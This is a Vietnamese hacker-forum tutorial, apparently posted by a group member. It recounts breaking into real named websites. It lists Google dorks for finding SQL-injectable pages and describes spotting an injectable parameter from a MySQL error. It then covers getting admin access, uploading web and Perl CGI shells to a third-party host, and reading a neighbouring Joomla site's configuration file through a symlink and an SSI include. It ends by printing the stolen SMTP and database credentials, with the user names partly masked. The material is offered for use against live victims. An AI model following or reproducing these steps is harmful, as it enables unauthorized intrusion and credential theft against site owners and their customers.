tut này bắt đầu vào 6:35:20s vcl chưa
p/s : xoay quanh vấn đề SQL jnjection + Local attack
+ Vào 1 ngày đẹp trời mưa to lắm ...lắm lắm luôn ,ngồi mò mẫm vào VNH lóc ngóc thấy vài mống,ít quá,nhưng ko sao, kệ mẹ, vào chém gió là chính, chém mãi cũng chán,anh ngồi rảnh lên google tìm với từ khóa "Dork hack shop"
ố la la trước mắt anh cả đống dork tha hồ mà hack nhá , nhưng nó quá cũ rồi biết làm sao đây,mình thì đã newbờe sẵn , chẳng lẽ ngồi ăn lại,ế-o chơi
Mã:
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
...............
..............
nhỡ may lại có gì đó xảy ra view_detail.php?ID=rồi anh quảng lên google , ố la la ra rất nhiều site , nhưng mẹ ngại check lắm thui anh cứ tìm lận page 10 trở đi cho ít
1 hồi hú hoáy anh mò ra được site shop-yishunbike.com
xem xơ qua cái link http://www.shop-yishunbike.com/index.php?option=com_virtuemart a anh phát hiện ra điều ĐM joomla
anh hí hửng check rank của nó cũng khá cao , chắc shop mới mở,vả lại anh thấy có chứ Payment : PayPal là anh nghĩ chắc shop paypal đây :X
anh ngồi xem ,xem xem ,rồi lại xem, mãi về sau anh reg lấy cái nick , nó có pp giờ làm sao hack nó đây
Anh nghĩ ngay tới BUG của joomla,anh lại lọ mọ lên google find find find..............................nhưng find hoài anh không thấy bug nào áp dụng được , anh đành phải xem server của nó thế nào
anh lại lên google gõ : reverser ip
http://ip.iuvn.net/Reverse-IP-Lookup...nbike.com.html he he nhiều site phét ấy nhở ...làm gì nữa đây
anh lại ngồi check check ấn ấn ấn ấn tụt cả quần anh thấy có mấy site VIỆT NAM ở đây....he he
anh lại lọ mọ tiếp , anh vớ được phải site : In Thành Đạt
nhưng site của nó chả có mẹ gì ,có mỗi cái ảnh to đùng , mẹ trêu nhau à
anh lại tiếp tục ấn vào google với từ khóa :
Hidden Block (1 post(s) are required, you have 0): site:inthanhdat.com |
ô đm nó ra cái gì nè
Hidden Block (1 post(s) are required, you have 0): http://www.inthanhdat.com/include/view_detail.php?ID=341 |
nhìn cái link thích vcl , thử thêm dấu ' cái xem thế nào...............................
Mã:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/yoursuum/public_html/inthanhdat.com/include/view_detail.php on line 7
khi hash 1 md5 nào đó thì trong cơ sở dữ liệu of site đó sẽ lưu lại và mình dễ dàng tìm ra
- anh vào được admin , và chuyện up shell cũng khá trôi chảy , anh có liền ngay con shell đẹp vcl
Hidden Block (1 post(s) are required, you have 0): http://hungvuongtour.com/js/tmt.php |
anh up cgi lên nó ko có chạy,kể cả perl,hay bypass gì gì đó cũng é-o chạy , giờ tính sao , vào mục cgi-bin up xem nào.........anh up xong rồi a chmod 755để chạy con shell
Hidden Block (1 post(s) are required, you have 0): http://hungvuongtour.com/cgi-bin/dot.pl |
a anh có ngay
shop-yishunbike.com : shopy7yx
đã xác định được path của nó
/home/shopy7yx/public_html
giờ biết nó làm bằng joomla , lên file config của nó là
/home/shopy7yx/public_html/configuration.php
Chạy lệnh symlink anh được
ln -s /home/shopy7yx/public_html/configuration.php tmt.txt
Hidden Block (1 post(s) are required, you have 0): http://hungvuongtour.com/cgi-bin/tmt.tmt pass: 1 |
Nhưng khi chạy link để xem thì anh bị vướng
Forbidden
You don't have permission to access /lang/tmt/tmt.txt on this server.
thử view bằng cái này xem
Mã:
<!--#include virtual="tmt.txt" -->
cuối cùng thì anh cũng được cái đống cò khỉ này
Mã:
var $smtpuser = 'yishunbike.com@gmail.com';
var $smtppass = 'lovexxxx';
Mã:
var $password = 'icarbonsports';
var $user = 'shopy7yx_xxxxx';
var $db = 'shopy7yx_xxxxx';
Tut by TMT - VNHgroup
